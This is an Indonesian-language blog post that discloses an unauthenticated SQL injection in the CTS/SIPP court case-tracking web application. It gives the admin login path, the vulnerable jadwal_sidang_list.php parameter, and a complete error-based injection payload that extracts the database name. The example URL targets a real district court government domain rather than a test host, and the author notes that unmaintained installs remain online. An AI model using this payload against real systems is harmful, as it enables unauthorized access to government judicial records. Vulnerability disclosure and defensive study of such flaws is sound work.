Ad Unit (Iklan) BIG

SIPP/CTS v2.*.* - Unauthenticated SQL Injection

2 comments


 -

Hai sobat

saya ikal,

Disini saya akan sharing lagi nih.

-

 

 Disini kita bahas vulnerability di WebApp dengan nama CTS (Case Tracking System). Yah sejenis SIPP (Sistem Informasi Penelusuran Perkara), Cuma yang CTS ini versi lawas dari SIPP.


Okeh kita langsung masuk saja kepembahasan,

- Admin Login : 

https://localhost/login/login.php 

https://localhost/[path]/login/login.php

- Vulnerable File : 

https://localhost/jadwal_sidang_list/jadwal_sidang_list.php?varlist_alur_perkara_id=[value][SQL INJECTION]

https://localhost/[path]/jadwal_sidang_list/jadwal_sidang_list.php?varlist_alur_perkara_id=[value][SQL INJECTION]

 

Tampilan Error

Example : 

http://cts2.pn-pangkalanbun.go.id/jadwal_sidang_list/jadwal_sidang_list.php?varlist_alur_perkara_id=2 ) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -


Ya itu saja yang ingin saya publish kali ini, WebApp CTS ini sendiri adalah versi lawas dari SIPP yang sekarang. Yah tentu saja sudah pada update lah ya:D. Hanya beberapa saja yang masih memakainya, Itupun menurut saya sudah tidak terurus :D.


Reference : 

https://www.draxploit.web.id/2020/09/sql-injection-errror-based-injection_2.html

 

Thanks

See U

Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

2 comments

Post a Comment

Dapatkan Notifikasi Dengan Email